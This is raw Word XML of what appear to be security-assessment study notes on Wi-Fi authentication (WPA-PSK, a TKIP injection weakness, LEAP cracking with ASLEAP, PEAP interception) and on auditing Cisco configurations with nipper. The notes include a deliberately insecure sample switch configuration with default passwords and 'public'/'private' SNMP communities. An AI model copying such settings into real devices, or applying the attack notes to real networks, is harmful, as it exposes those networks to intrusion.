        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that don't require the complexity of an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 802.1X authentication server</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Each wireless network device encrypts the network traffic using a 256 bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shared-key WPA remains vulnerable to password cracking attacks if users rely on a weak passphrase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To further protect against intrusion the network's SSID should not match any entry in the top 1000 SSIDs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A WPA weakness exists which relied on a previously known flaw in WEP that could be exploited only for the TKIP algorithm in WPA. The flaw does not lead to key recovery, but only a keystream that encrypted a particular packet, and which can be reused as many as seven times to inject arbitrary data of the same packet length to a wireless client. For example, this allows someone to inject </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>faked ARP packets which makes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the victim send packets to the open Internet. This attack was further optimised enabling attackers to inject larger malicious packets (596 bytes, to be more specific) within approximately 18 minutes and 25 seconds. This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">does </w:t>
      </w:r>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">not affect WPA2 systems that </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use the stronger CCMP algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA- and WPA2- Enterprise integrate the use of EAP to perform 802.1x authentication via a remote authentication server and 802.1x enabled clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00996576" w:rsidRDefault="00996576" w:rsidP="00996576"/>
    <w:p w:rsidR="00B50C46" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>EAP/LEAP/PEAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Wi-Fi alliance has announced the inclusion of additional EAP (Extensible Authentication Protocol) types to its certification programs for WPA- and WPA2- Enterprise certification programs. This was to ensure that WPA-Enterprise certified products can interoperate with one another. Previously, only EAP-TLS (Transport Layer Security) was certified by the Wi-Fi alliance. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The EAP types now included in the certification program are: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EAP-TLS (previously tested) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EAP-TTLS/MSCHAPv2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PEAPv0/EAP-MSCHAPv2 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PEAPv1/EAP-GTC </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EAP-SIM </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00996576" w:rsidP="00996576">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00996576" w:rsidRPr="00342F29" w:rsidRDefault="00DB0DB2" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EAP-TLS – this was the first EAP authentication technique required for WPA/WPA2 compatibility. EAP-TLS is very secure. It uses client- and server-side certificates to authenticate all users in a network – this is also its major downfall. Managing certificates for all users in an organisation of any size can be a daunting challenge. Most organisations just don’t have in place the level of PKI required. Attacking the EAP-TLS protocol head on is pretty much impossible.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DB0DB2" w:rsidRPr="00342F29" w:rsidRDefault="00DB0DB2" w:rsidP="00342F29">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DB0DB2" w:rsidRPr="00342F29" w:rsidRDefault="00DB0DB2" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEAP – lightweight EAP is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a  Cisco</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> propriety protocol. </w:t>
      </w:r>
      <w:r w:rsidR="00342F29" w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Important features of LEAP are dynamic WEP keys and mutual authentication (between a wireless client and a RADIUS server). LEAP allows for clients to reauthenticate frequently; upon each successful authentication, the clients acquire a new WEP key (with the hope that the WEP keys don't live long enough to be cracked). LEAP may be configured to use TKIP WPA instead of dynamic WEP.</w:t>
      </w:r>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00342F29" w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>However leap is deployed it is vulnerable to to a severe security problem. LEAP uses a modified version of MS-CHAP, an authentication protocol in which user credentials are not strongly protected. Automated tools like ASLEAP demonstrate the simplicity of getting unauthorized access in networks protected by LEAP implementations</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00342F29" w:rsidRPr="00342F29" w:rsidRDefault="00342F29" w:rsidP="00342F29">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00342F29" w:rsidRPr="00342F29" w:rsidRDefault="00342F29" w:rsidP="002717D6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PEAP - Protected Extensible Authentication Protocol is similar in design to EAP-TTLS, requiring only a server-side PKI certificate to create a secure TLS tunnel to protect user authentication, and uses server-</w:t>
      </w:r>
      <w:r w:rsidRPr="00342F29">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>side public key certificates to authenticate the server. It then creates an encrypted TLS tunnel between the client and the authentication server. In most configurations, the keys for this encryption are transported using the server's public key. The ensuing exchange of authentication information inside the tunnel to authenticate the client is then encrypted and user credentials are safe from eavesdropping.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Vulnerable to man-in-the-middle attacks if the client doesn’t validate the servers certificate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B50C46"/>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>D7 - Configuration Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>D7a - Analysing configuration files from the following types of Cisco equipment:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12BF6" w:rsidRDefault="00B12BF6" w:rsidP="00B12BF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Routers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Same as switch really (see below)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>nipper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –ios-router –input=&lt;conf file&gt; --output=report.html</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRDefault="00B12BF6" w:rsidP="00DC7637">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Switches</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Use nipper:</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shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t>nipper</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> –ios-switch –input=&lt;conf file&gt; --output=report.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637"/>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>On the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DC7637" w:rsidRPr="00DC7637" w:rsidRDefault="00DC7637" w:rsidP="00DC7637"/>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switch02#sh run</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Building configuration...</w:t>
      </w:r>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Current </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>configuration :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> a number of bytes</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Last configuration change at sometime Fri June 10 2006 by anyone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NVRAM config last updated at sometime Sat August 2 2006 by anyone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version</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 12.3</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tcp-keepalives-out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hostname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> switch02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clock</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> timezone GMT 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clock</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> summer-time GMT recurring</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domain-name nipper.org</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privilege</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> exec level chicken</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enable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> password cisco</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username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> temp privilege 15 password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username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> testuser privilege 15 password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boot</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> network</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finger</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tcp-small-servers</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udp-small-servers</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community public RO 20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community private RW 20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location Somewhere</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host 192.168.20.30 private snmp</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host 192.168.20.40 private snmp</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interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> GigabitEthernet1/1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description</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> First interface on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speed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100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duplex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> full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address 10.0.0.1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directed-broadcast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switchport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode trunk</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mask-reply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interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> GigabitEthernet1/2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description</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Second interface on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speed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 100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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>duplex</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> full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address 10.0.0.2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directed-broadcast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switchport</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> mode trunk</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mask-reply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access-list extended named-acl-1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deny</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ip host 172.168.2.3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deny</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> ip host 10.8.10.11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any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access-list extended named-acl-2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host 192.168.76.4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host 172.18.19.1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110 permit tcp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ip 50.60.0.0 0.0.255.255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eq ftp any log-input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host 192.168.30.40 eq snmp</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host 192.168.30.56 eq 9876</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192.168.2.1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172.10.1.35</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10.0.0.1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192.168.0.1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deny   any log</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con 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session-timeout</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> 25</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password</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC7637">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
